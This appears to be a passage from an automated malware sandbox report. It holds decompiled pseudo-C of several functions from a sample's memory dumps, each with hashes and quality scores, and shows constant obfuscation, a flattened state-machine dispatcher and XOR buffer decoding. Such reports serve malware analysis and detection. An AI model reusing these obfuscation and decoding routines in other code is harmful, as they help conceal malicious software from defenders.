                                                      				unsigned int _t67;
                                                      				unsigned int* _t70;
                                                      				signed int* _t71;
                                                      				signed int* _t72;
                                                      				unsigned int _t74;
                                                      				void* _t80;
                                                      				void* _t82;
                                                      				void* _t84;
                                                      				void* _t85;
                                                      
                                                      				_push( *((intOrPtr*)(_t84 + 0x18)));
                                                      				_push( *(_t84 + 0x24));
                                                      				_push(__ecx);
                                                      				_t40 = E0023602B( *((intOrPtr*)(_t84 + 0x18)));
                                                      				 *(_t84 + 0x34) = 0x2399;
                                                      				_t4 =  &(_t40[1]); // 0x4
                                                      				_t71 = _t4;
                                                      				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbd3b6;
                                                      				 *(_t84 + 0x34) =  *(_t84 + 0x34) + 0xfffffbe3;
                                                      				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbb717;
                                                      				 *(_t84 + 0x20) = 0xf668;
                                                      				 *(_t84 + 0x20) =  *(_t84 + 0x20) | 0x7255987b;
                                                      				 *(_t84 + 0x20) =  *(_t84 + 0x20) ^ 0x7255e635;
                                                      				 *(_t84 + 0x1c) = 0x6aea;
                                                      				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) + 0xffff3e88;
                                                      				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) ^ 0xffff96c8;
                                                      				_t58 =  *_t40;
                                                      				_t72 =  &(_t71[1]);
                                                      				_t42 =  *_t71 ^ _t58;
                                                      				 *(_t84 + 0x24) = _t58;
                                                      				 *(_t84 + 0x28) = _t42;
                                                      				_t23 = _t42 + 1; // 0x1
                                                      				_t74 =  !=  ? (_t23 & 0xfffffffc) + 4 : _t23;
                                                      				_t85 = _t84 + 8;
                                                      				_t55 = E00238736(_t74);
                                                      				 *(_t85 + 0x2c) = _t55;
                                                      				if(_t55 != 0) {
                                                      					_t82 = 0;
                                                      					_t70 = _t55;
                                                      					_t80 =  >  ? 0 :  &(_t72[_t74 >> 2]) - _t72 + 3 >> 2;
                                                      					if(_t80 != 0) {
                                                      						_t56 =  *(_t85 + 0x18);
                                                      						do {
                                                      							_t65 =  *_t72;
                                                      							_t72 =  &(_t72[1]);
                                                      							_t66 = _t65 ^ _t56;
                                                      							 *_t70 = _t66;
                                                      							_t70 =  &(_t70[1]);
                                                      							_t67 = _t66 >> 0x10;
                                                      							 *((char*)(_t70 - 3)) = _t66 >> 8;
                                                      							 *(_t70 - 2) = _t67;
                                                      							_t82 = _t82 + 1;
                                                      							 *((char*)(_t70 - 1)) = _t67 >> 8;
                                                      						} while (_t82 < _t80);
                                                      						_t55 =  *(_t85 + 0x28);
                                                      					}
                                                      					 *((char*)(_t55 +  *((intOrPtr*)(_t85 + 0x1c)))) = 0;
                                                      				}
                                                      				return _t55;
                                                      			}




















                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5Ur$j
                                                      • API String ID: 0-2435424154
                                                      • Opcode ID: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
                                                      • Instruction ID: 16e8732b170713eca28be14933234b49325343d7a04c270b12e534ebe0a762fb
                                                      • Opcode Fuzzy Hash: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
                                                      • Instruction Fuzzy Hash: 30318D72A193018FD318CF29C88545BFBE0EF98714F454B5DF989A7251D734E90ACB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E00249586(intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				intOrPtr _v44;
                                                      				void* _t78;
                                                      				void* _t80;
                                                      				intOrPtr* _t81;
                                                      				intOrPtr _t95;
                                                      
                                                      				_v40 = _v40 & 0x00000000;
                                                      				_v44 = 0x5b9444;
                                                      				_v12 = 0xdcba;
                                                      				_v12 = _v12 >> 4;
                                                      				_v12 = _v12 >> 4;
                                                      				_v12 = _v12 + 0x949;
                                                      				_v12 = _v12 ^ 0x00001af4;
                                                      				_v8 = 0x3cb;
                                                      				_v8 = _v8 + 0xffff192d;
                                                      				_v8 = _v8 + 0x1519;
                                                      				_v8 = _v8 ^ 0xffff4a83;
                                                      				_v20 = 0x60da;
                                                      				_v20 = _v20 >> 4;
                                                      				_t95 = _a4;
                                                      				_v20 = _v20 * 0x71;
                                                      				_v20 = _v20 ^ 0x0002f52e;
                                                      				_v24 = 0x45f5;
                                                      				_v24 = _v24 ^ 0x8ddfc3a3;
                                                      				_v24 = _v24 | 0x63507c9c;
                                                      				_v24 = _v24 ^ 0xefdfb5dc;
                                                      				_v32 = 0xfa49;
                                                      				_v32 = _v32 ^ 0xb8265659;
                                                      				_v32 = _v32 ^ 0xb826ab18;
                                                      				_v28 = 0xa34;
                                                      				_v28 = _v28 | 0x478cb459;
                                                      				_v28 = _v28 ^ 0x0d1ea304;
                                                      				_v28 = _v28 ^ 0x4a9200da;
                                                      				_v36 = 0x43f7;
                                                      				_v36 = _v36 >> 0xb;
                                                      				_v36 = _v36 ^ 0x00001d3e;
                                                      				_v16 = 0x9c5f;
                                                      				_v16 = _v16 * 0x1d;
                                                      				_v16 = _v16 * 0x2e;
                                                      				_v16 = _v16 << 5;
                                                      				_v16 = _v16 ^ 0x65dacbc4;
                                                      				_t78 =  *((intOrPtr*)(_t95 + 4))( *((intOrPtr*)(_t95 + 0x28)), 1, 0);
                                                      				_t98 = _t78;
                                                      				if(_t78 != 0) {
                                                      					_push(0x24c860);
                                                      					_push(_v20);
                                                      					_t80 = E0024878F(_v12, _v8, _t98);
                                                      					_push(_v32);
                                                      					_t93 = _t80;
                                                      					_push(_v24);
                                                      					_t81 = E00246965(_t80,  *((intOrPtr*)(_t95 + 0x28)));
                                                      					if(_t81 != 0) {
                                                      						 *_t81();
                                                      					}
                                                      					E00242025(_v28, _t93, _v36, _v16);
                                                      				}
                                                      				return 0;
                                                      			}


















                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4$I
                                                      • API String ID: 0-2585635819
                                                      • Opcode ID: 8fd5369d6799bd54ecdbb129b27ccd2cbbd194491ded85fea06683789b4f38b4
                                                      • Instruction ID: 5162b11a00b8ca7b709bc65c3caaf85bca6e0c9328ec849e39eb9819e6616983
                                                      • Opcode Fuzzy Hash: 8fd5369d6799bd54ecdbb129b27ccd2cbbd194491ded85fea06683789b4f38b4
                                                      • Instruction Fuzzy Hash: 1C4112B1D0020AEBEF08DFA1C94A6EEBBB0FB44314F208159D411B6290D3B9AB55CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 90%
                                                      			E00237998(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				void* _t74;
                                                      				intOrPtr _t83;
                                                      				signed int _t85;
                                                      				signed int _t86;
                                                      				signed int _t96;
                                                      				intOrPtr* _t97;
                                                      
                                                      				_t97 = _a4;
                                                      				_push(_a12);
                                                      				_t96 = _a8;
                                                      				_push(_t96);
                                                      				_push(_t97);
                                                      				E0023602B(_t74);
                                                      				_v24 = 0x43bd;
                                                      				_v24 = _v24 >> 0xe;
                                                      				_v24 = _v24 ^ 0x00002257;
                                                      				_v20 = 0xfb35;
                                                      				_v20 = _v20 ^ 0x316dcd7c;
                                                      				_v20 = _v20 ^ 0x316d5b09;
                                                      				_v8 = 0x86ca;
                                                      				_t85 = 0x26;
                                                      				_v8 = _v8 / _t85;
                                                      				_v8 = _v8 + 0xffffb56c;
                                                      				_v8 = _v8 ^ 0xffffa5a2;
                                                      				_a4 = 0x6ea8;
                                                      				_a4 = _a4 | 0xeb58ef4a;
                                                      				_a4 = _a4 << 6;
                                                      				_t86 = 0x7d;
                                                      				_a4 = _a4 / _t86;
                                                      				_a4 = _a4 ^ 0x01b6ec6f;
                                                      				_v16 = 0xf7ce;
                                                      				_v16 = _v16 + 0xffffb713;
                                                      				_v16 = _v16 + 0xe2af;
                                                      				_v16 = _v16 ^ 0x0001a1e1;
                                                      				_v12 = 0x7f90;
                                                      				_v12 = _v12 >> 9;
                                                      				_v12 = _v12 ^ 0x9419cfce;
                                                      				_v12 = _v12 ^ 0x9419fbb9;
                                                      				_a8 = 0xab6f;
                                                      				_a8 = _a8 * 0x2a;
                                                      				_a8 = _a8 >> 0xf;
                                                      				_a8 = _a8 | 0x38dd753e;
                                                      				_a8 = _a8 ^ 0x38dd1846;
                                                      				E0024360F(_t96, _v24, _v20,  *((intOrPtr*)(_t97 + 4)), _v8);
                                                      				E00242674(_a4, _v16,  *((intOrPtr*)(_t97 + 4)),  *((intOrPtr*)(_t96 + 0x34)), _v12, _a8,  *_t97);
                                                      				_t83 =  *((intOrPtr*)(_t97 + 4));
                                                      				 *((intOrPtr*)(_t96 + 0x34)) =  *((intOrPtr*)(_t96 + 0x34)) + _t83;
                                                      				return _t83;
                                                      			}















                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [m1$JX
                                                      • API String ID: 0-848362422
                                                      • Opcode ID: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
                                                      • Instruction ID: bfe028f06cca24ec59237103dad3180a3a3025ae38e566775aaca1ac43e469d8
                                                      • Opcode Fuzzy Hash: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
                                                      • Instruction Fuzzy Hash: 8D310475900209FBCF58CFA5D94A89EBBB5FF44314F20C059E9196A260D3799B24DF80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E00239A37(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				unsigned int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				signed int _v112;
                                                      				signed int _v116;
                                                      				signed int _v120;
                                                      				signed int _v124;
                                                      				char _v196;
                                                      				void* _t297;
                                                      				signed int _t335;
                                                      				signed int* _t340;
                                                      				signed int _t342;
                                                      				signed int _t343;
                                                      				signed int _t344;
                                                      				signed int _t345;
                                                      				signed int _t346;
                                                      				signed int _t347;
                                                      				char* _t354;
                                                      				void* _t380;
                                                      				void* _t381;
                                                      				void* _t382;
                                                      				void* _t383;
                                                      				void* _t386;
                                                      
                                                      				_push(_a8);
                                                      				_t340 = __edx;
                                                      				_t380 = __ecx;
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(_t297);
                                                      				_v24 = 0xc44;
                                                      				_t383 = _t382 + 0x10;
                                                      				_v24 = _v24 << 2;
                                                      				_v24 = _v24 << 5;
                                                      				_t381 = 0x108b8bb2;
                                                      				_v24 = _v24 >> 1;
                                                      				_v24 = _v24 ^ 0x0003068b;
                                                      				_v96 = 0x3b9e;
                                                      				_v96 = _v96 ^ 0x893884c8;
                                                      				_v96 = _v96 ^ 0x89388972;
                                                      				_v48 = 0x8b0e;
                                                      				_v48 = _v48 << 6;
                                                      				_v48 = _v48 + 0xffffd606;
                                                      				_t342 = 0x6d;
                                                      				_v48 = _v48 * 0x69;
                                                      				_v48 = _v48 ^ 0x0e30afa5;
                                                      				_v76 = 0xbb1c;
                                                      				_v76 = _v76 + 0xffff2a80;
                                                      				_v76 = _v76 | 0x384e25df;
                                                      				_v76 = _v76 ^ 0xffffbccb;
                                                      				_v68 = 0x817b;
                                                      				_v68 = _v68 + 0xb36b;
                                                      				_v68 = _v68 * 0x62;
                                                      				_v68 = _v68 ^ 0x00761722;
                                                      				_v112 = 0x78f7;
                                                      				_v112 = _v112 + 0xabd9;
                                                      				_v112 = _v112 ^ 0x00010bcc;
                                                      				_v64 = 0xef7a;
                                                      				_v64 = _v64 * 0x6b;
                                                      				_v64 = _v64 >> 6;
                                                      				_v64 = _v64 ^ 0x0001bb5c;
                                                      				_v104 = 0x32c;
                                                      				_v104 = _v104 << 5;
                                                      				_v104 = _v104 ^ 0x00002d3d;
                                                      				_v52 = 0x7426;
                                                      				_v52 = _v52 * 0x5d;
                                                      				_v52 = _v52 ^ 0xa80e6da6;
                                                      				_v52 = _v52 / _t342;
                                                      				_v52 = _v52 ^ 0x018aaa04;
                                                      				_v12 = 0xd0fb;
                                                      				_t343 = 0x6a;
                                                      				_v12 = _v12 / _t343;
                                                      				_v12 = _v12 + 0xffff7920;
                                                      				_v12 = _v12 + 0xffff83ce;
                                                      				_v12 = _v12 ^ 0xfffec2a6;
                                                      				_v108 = 0xe89;
                                                      				_v108 = _v108 + 0x85a8;
                                                      				_v108 = _v108 ^ 0x0000adac;
                                                      				_v92 = 0xd004;
                                                      				_v92 = _v92 + 0xffff90ab;
                                                      				_v92 = _v92 | 0x2bfbb4c5;
                                                      				_v92 = _v92 ^ 0x2bfba16d;
                                                      				_v8 = 0x51d1;
                                                      				_v8 = _v8 ^ 0x91ec542a;
                                                      				_v8 = _v8 | 0xbd5d6296;
                                                      				_v8 = _v8 + 0xe80e;
                                                      				_v8 = _v8 ^ 0xbdfe1041;
                                                      				_v40 = 0xc5fc;
                                                      				_v40 = _v40 | 0x331e7523;
                                                      				_v40 = _v40 + 0xc476;
                                                      				_v40 = _v40 | 0xe5b13554;
                                                      				_v40 = _v40 ^ 0xf7bfa45a;
                                                      				_v116 = 0x6d98;
                                                      				_v116 = _v116 >> 0xf;
                                                      				_v116 = _v116 ^ 0x000044aa;
                                                      				_v88 = 0x7357;
                                                      				_v88 = _v88 + 0x7cff;
                                                      				_t344 = 0x6e;
                                                      				_v88 = _v88 * 0x25;
                                                      				_v88 = _v88 ^ 0x0022e11b;
                                                      				_v56 = 0x39e0;
                                                      				_v56 = _v56 + 0xffffb0fb;
                                                      				_v56 = _v56 << 6;
                                                      				_v56 = _v56 ^ 0xfffab6b2;
                                                      				_v44 = 0x2257;
                                                      				_v44 = _v44 / _t344;
                                                      				_v44 = _v44 + 0x17fe;
                                                      				_v44 = _v44 + 0xffff4b8e;
                                                      				_v44 = _v44 ^ 0xffff3a3c;
                                                      				_v16 = 0xac11;
                                                      				_t345 = 0xd;
                                                      				_v16 = _v16 / _t345;
                                                      				_t346 = 0x22;
                                                      				_v16 = _v16 / _t346;
                                                      				_v16 = _v16 + 0xffff8051;
                                                      				_v16 = _v16 ^ 0xffffec84;
                                                      				_v32 = 0x207e;
                                                      				_v32 = _v32 + 0xffff85d9;
                                                      				_v32 = _v32 | 0x92dc0f10;
                                                      				_t347 = 0x3d;
                                                      				_v32 = _v32 * 0x4f;
                                                      				_v32 = _v32 ^ 0xffe76a4a;
                                                      				_v72 = 0xf5a4;
                                                      				_v72 = _v72 << 9;
                                                      				_v72 = _v72 + 0x6505;
                                                      				_v72 = _v72 ^ 0x01ebcff4;
                                                      				_v124 = 0xf81;
                                                      				_v124 = _v124 + 0x174a;
                                                      				_v124 = _v124 ^ 0x00005562;
                                                      				_v80 = 0xd566;
                                                      				_v80 = _v80 << 0xd;
                                                      				_v80 = _v80 << 0xa;
                                                      				_v80 = _v80 ^ 0xb30025af;
                                                      				_v20 = 0xd4e9;
                                                      				_v20 = _v20 ^ 0x0ea0d6e7;
                                                      				_v20 = _v20 / _t347;
                                                      				_v20 = _v20 | 0xf8279f10;
                                                      				_v20 = _v20 ^ 0xf83fc9b3;
                                                      				_v100 = 0xda9a;
                                                      				_v100 = _v100 * 3;
                                                      				_v100 = _v100 ^ 0x0002f5f9;
                                                      				_v36 = 0x78aa;
                                                      				_v36 = _v36 + 0x4117;
                                                      				_v36 = _v36 >> 0xa;
                                                      				_v36 = _v36 | 0x25804fa7;
                                                      				_v36 = _v36 ^ 0x25803510;
                                                      				_v28 = 0x20d5;
                                                      				_v28 = _v28 + 0xfab3;
                                                      				_v28 = _v28 | 0xa4f7c20c;
                                                      				_v28 = _v28 >> 3;
                                                      				_v28 = _v28 ^ 0x149e8671;
                                                      				_v60 = 0x9445;
                                                      				_v60 = _v60 | 0xc2ce9f5c;
                                                      				_v60 = _v60 ^ 0x46e2878d;
                                                      				_v60 = _v60 ^ 0x842c5375;
                                                      				_v120 = 0x3512;
                                                      				_v120 = _v120 << 9;
                                                      				_v120 = _v120 ^ 0x006a5627;
                                                      				_v84 = 0xeb51;
                                                      				_v84 = _v84 * 0x42;
                                                      				_v84 = _v84 >> 0xf;
                                                      				_v84 = _v84 ^ 0x000027de;
                                                      				goto L1;
                                                      				do {
                                                      					while(1) {
                                                      						L1:
                                                      						_t386 = _t381 - 0x1e9793a2;
                                                      						if(_t386 > 0) {
                                                      							break;
                                                      						}
                                                      						if(_t386 == 0) {
                                                      							E00237998(_v100, _v36, __eflags, _t380 + 0x20,  &_v196, _v28);
                                                      							_t383 = _t383 + 0xc;
                                                      							_t381 = 0x39ecd3df;
                                                      							continue;
                                                      						} else {
                                                      							if(_t381 == 0xaa31e0c) {
                                                      								E00237998(_v124, _v80, __eflags, _t380 + 0x18,  &_v196, _v20);
                                                      								_t383 = _t383 + 0xc;
                                                      								_t381 = 0x1e9793a2;
                                                      								continue;
                                                      							} else {
                                                      								if(_t381 == 0x108b8bb2) {
                                                      									 *_t340 =  *_t340 & 0x00000000;
                                                      									_t381 = 0x23e4e38d;
                                                      									_t340[1] = _t340[1] & 0x00000000;
                                                      									continue;
                                                      								} else {
                                                      									if(_t381 == 0x15969886) {
                                                      										_t354 =  &_v196;
                                                      										E0024360F(_t354, _v12, _v108,  *((intOrPtr*)(_t380 + 8)), _v92);
                                                      										_t383 = _t383 + 0xc;
                                                      										_t381 = 0x15fd630a;
                                                      										continue;
                                                      									} else {
                                                      										if(_t381 == 0x15fd630a) {
                                                      											_t354 =  &_v196;
                                                      											E0024360F(_t354, _v8, _v40,  *((intOrPtr*)(_t380 + 0xc)), _v116);
                                                      											_t383 = _t383 + 0xc;
                                                      											_t381 = 0x2ea6dd43;
                                                      											continue;
                                                      										} else {
                                                      											if(_t381 == 0x18d3ef4a) {
                                                      												_push(_t354);
                                                      												_t335 = E00238736(_t340[1]);
                                                      												 *_t340 = _t335;
                                                      												_t354 = _t354;
                                                      												__eflags = _t335;
                                                      												if(__eflags != 0) {
                                                      													_t381 = 0x22e1be53;
                                                      													continue;
                                                      												}
                                                      											} else {
                                                      												if(_t381 != 0x1a35bcc9) {
                                                      													goto L28;
                                                      												} else {
                                                      													_t354 =  &_v196;
                                                      													E0024360F(_t354, _v16, _v32,  *((intOrPtr*)(_t380 + 0x14)), _v72);
                                                      													_t383 = _t383 + 0xc;
                                                      													_t381 = 0xaa31e0c;
                                                      													continue;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L23:
                                                      						__eflags =  *_t340;
                                                      						_t282 =  *_t340 != 0;
                                                      						__eflags = _t282;
                                                      						return 0 | _t282;
                                                      					}
                                                      					__eflags = _t381 - 0x22e1be53;
                                                      					if(_t381 == 0x22e1be53) {
                                                      						E002450F2( &_v196, _v76, _v68, _v112, _t340);
                                                      						_t383 = _t383 + 0xc;
                                                      						_t381 = 0x2d15c716;
                                                      						goto L28;
                                                      					} else {
                                                      						__eflags = _t381 - 0x23e4e38d;
                                                      						if(_t381 == 0x23e4e38d) {
                                                      							_t340[1] = E00247F1F(_t380);
                                                      							_t381 = 0x18d3ef4a;
                                                      							goto L1;
                                                      						} else {
                                                      							__eflags = _t381 - 0x2d15c716;
                                                      							if(__eflags == 0) {
                                                      								E00237998(_v64, _v104, __eflags, _t380,  &_v196, _v52);
                                                      								_t383 = _t383 + 0xc;
                                                      								_t381 = 0x15969886;
                                                      								goto L1;
                                                      							} else {
                                                      								__eflags = _t381 - 0x2ea6dd43;
                                                      								if(_t381 == 0x2ea6dd43) {
                                                      									E0024360F( &_v196, _v88, _v56,  *((intOrPtr*)(_t380 + 0x10)), _v44);
                                                      									_t383 = _t383 + 0xc;
                                                      									_t381 = 0x1a35bcc9;
                                                      									goto L1;
                                                      								} else {
                                                      									__eflags = _t381 - 0x39ecd3df;
                                                      									if(_t381 != 0x39ecd3df) {
                                                      										goto L28;
                                                      									} else {
                                                      										E0024360F( &_v196, _v60, _v120,  *((intOrPtr*)(_t380 + 0x28)), _v84);
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					goto L23;
                                                      					L28:
                                                      					__eflags = _t381 - 0x1d48367e;
                                                      				} while (__eflags != 0);
                                                      				goto L23;
                                                      			}

                                                      0x00239c6e
                                                      0x00239c76
                                                      0x00239c7b
                                                      0x00239c80
                                                      0x00239c87
                                                      0x00239c8e
                                                      0x00239c95
                                                      0x00239c9c
                                                      0x00239ca7
                                                      0x00239ca8
                                                      0x00239cab
                                                      0x00239cb2
                                                      0x00239cb9
                                                      0x00239cbd
                                                      0x00239cc4
                                                      0x00239ccb
                                                      0x00239cd2
                                                      0x00239cd9
                                                      0x00239ce0
                                                      0x00239ce7
                                                      0x00239ceb
                                                      0x00239cef
                                                      0x00239cf6
                                                      0x00239cfd
                                                      0x00239d09
                                                      0x00239d0c
                                                      0x00239d13
                                                      0x00239d1a
                                                      0x00239d25
                                                      0x00239d28
                                                      0x00239d2f
                                                      0x00239d36
                                                      0x00239d3d
                                                      0x00239d41
                                                      0x00239d48
                                                      0x00239d4f
                                                      0x00239d56
                                                      0x00239d5d
                                                      0x00239d64
                                                      0x00239d68
                                                      0x00239d6f
                                                      0x00239d76
                                                      0x00239d7d
                                                      0x00239d84
                                                      0x00239d8b
                                                      0x00239d92
                                                      0x00239d96
                                                      0x00239d9d
                                                      0x00239da8
                                                      0x00239dab
                                                      0x00239daf
                                                      0x00239daf
                                                      0x00239db6
                                                      0x00239db6
                                                      0x00239db6
                                                      0x00239db6
                                                      0x00239dbc
                                                      0x00000000
                                                      0x00000000
                                                      0x00239dc2
                                                      0x00239ee5
                                                      0x00239eea
                                                      0x00239eed
                                                      0x00000000
                                                      0x00239dc8
                                                      0x00239dce
                                                      0x00239ebf
                                                      0x00239ec4
                                                      0x00239ec7
                                                      0x00000000
                                                      0x00239dd4
                                                      0x00239dda
                                                      0x00239e9a
                                                      0x00239e9d
                                                      0x00239ea2
                                                      0x00000000
                                                      0x00239de0
                                                      0x00239de6
                                                      0x00239e79
                                                      0x00239e88
                                                      0x00239e8d
                                                      0x00239e90
                                                      0x00000000
                                                      0x00239dec
                                                      0x00239df2
                                                      0x00239e55
                                                      0x00239e64
                                                      0x00239e69
                                                      0x00239e6c
                                                      0x00000000
                                                      0x00239df4
                                                      0x00239dfa
                                                      0x00239e32
                                                      0x00239e37
                                                      0x00239e3c
                                                      0x00239e3f
                                                      0x00239e40
                                                      0x00239e42
                                                      0x00239e48
                                                      0x00000000
                                                      0x00239e48
                                                      0x00239dfc
                                                      0x00239e02
                                                      0x00000000
                                                      0x00239e08
                                                      0x00239e0b
                                                      0x00239e1a
                                                      0x00239e1f
                                                      0x00239e22
                                                      0x00000000
                                                      0x00239e22
                                                      0x00239e02
                                                      0x00239dfa
                                                      0x00239df2
                                                      0x00239de6
                                                      0x00239dda
                                                      0x00239dce
                                                      0x00239f45
                                                      0x00239f47
                                                      0x00239f4b
                                                      0x00239f4b
                                                      0x00239f52
                                                      0x00239f52
                                                      0x00239ef7
                                                      0x00239efd
                                                      0x00239fbe
                                                      0x00239fc3
                                                      0x00239fc6
                                                      0x00000000
                                                      0x00239f03
                                                      0x00239f03
                                                      0x00239f09
                                                      0x00239fa1
                                                      0x00239fa4
                                                      0x00000000
                                                      0x00239f0f
                                                      0x00239f0f
                                                      0x00239f15
                                                      0x00239f88
                                                      0x00239f8d
                                                      0x00239f90
                                                      0x00000000
                                                      0x00239f17
                                                      0x00239f17
                                                      0x00239f1d
                                                      0x00239f65
                                                      0x00239f6a
                                                      0x00239f6d
                                                      0x00000000
                                                      0x00239f1f
                                                      0x00239f1f
                                                      0x00239f25
                                                      0x00000000
                                                      0x00239f2b
                                                      0x00239f3d
                                                      0x00239f42
                                                      0x00239f25
                                                      0x00239f1d
                                                      0x00239f15
                                                      0x00239f09
                                                      0x00000000
                                                      0x00239fcb
                                                      0x00239fcb
                                                      0x00239fcb
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 'Vj
                                                      • API String ID: 0-2210790371
                                                      • Opcode ID: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
                                                      • Instruction ID: 2a01e980c180af9460aa1de851f2b51b45cdc2a622f8b1d539ce2b9d131d501b
                                                      • Opcode Fuzzy Hash: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
                                                      • Instruction Fuzzy Hash: D1F132B2C1031ADBDF18DFE5C98A9DEBBB1FB04314F248159D416BA2A0D7B41A95CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00241BDF() {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				unsigned int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				unsigned int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				char _v112;
                                                      				short _t303;
                                                      				void* _t311;
                                                      				void* _t314;
                                                      				void* _t315;
                                                      				intOrPtr _t347;
                                                      				void* _t348;
                                                      				short* _t349;
                                                      				void* _t350;
                                                      				short* _t351;
                                                      				short* _t352;
                                                      				signed int _t353;
                                                      				signed int _t354;
                                                      				signed int _t355;
                                                      				signed int _t356;
                                                      				signed int _t357;
                                                      				signed int _t358;
                                                      				signed int _t359;
                                                      				signed int _t360;
                                                      				signed int _t361;
                                                      				signed int _t362;
                                                      				signed int _t363;
                                                      				signed int _t364;
                                                      				void* _t365;
                                                      
                                                      				_t347 =  *0x24ca2c; // 0x698300
                                                      				_v48 = 0xd714;
                                                      				_t348 = _t347 + 0x230;
                                                      				_v48 = _v48 ^ 0xcd668ab2;
                                                      				_t315 = 0x3a31b660;
                                                      				_v48 = _v48 | 0x2f181106;
                                                      				_v48 = _v48 ^ 0xef7e1823;
                                                      				_v84 = 0x5d44;
                                                      				_t353 = 0x2d;
                                                      				_v84 = _v84 / _t353;
                                                      				_v84 = _v84 ^ 0x00001499;
                                                      				_v28 = 0xf70b;
                                                      				_t354 = 0xd;
                                                      				_v28 = _v28 / _t354;
                                                      				_v28 = _v28 | 0x6a0646bd;
                                                      				_v28 = _v28 >> 1;
                                                      				_v28 = _v28 ^ 0x35037bad;
                                                      				_v24 = 0xed7c;
                                                      				_v24 = _v24 + 0xffff8d1e;
                                                      				_v24 = _v24 + 0xffff0c72;
                                                      				_t355 = 0x48;
                                                      				_v24 = _v24 / _t355;
                                                      				_v24 = _v24 ^ 0x038e22ac;
                                                      				_v64 = 0x5fc5;
                                                      				_v64 = _v64 >> 4;
                                                      				_v64 = _v64 << 1;
                                                      				_v64 = _v64 ^ 0x000058c3;
                                                      				_v92 = 0x2688;
                                                      				_v92 = _v92 | 0xea27999c;
                                                      				_v92 = _v92 ^ 0xea278961;
                                                      				_v96 = 0x4a14;
                                                      				_t356 = 0x1f;
                                                      				_v96 = _v96 / _t356;
                                                      				_v96 = _v96 ^ 0x0000119a;
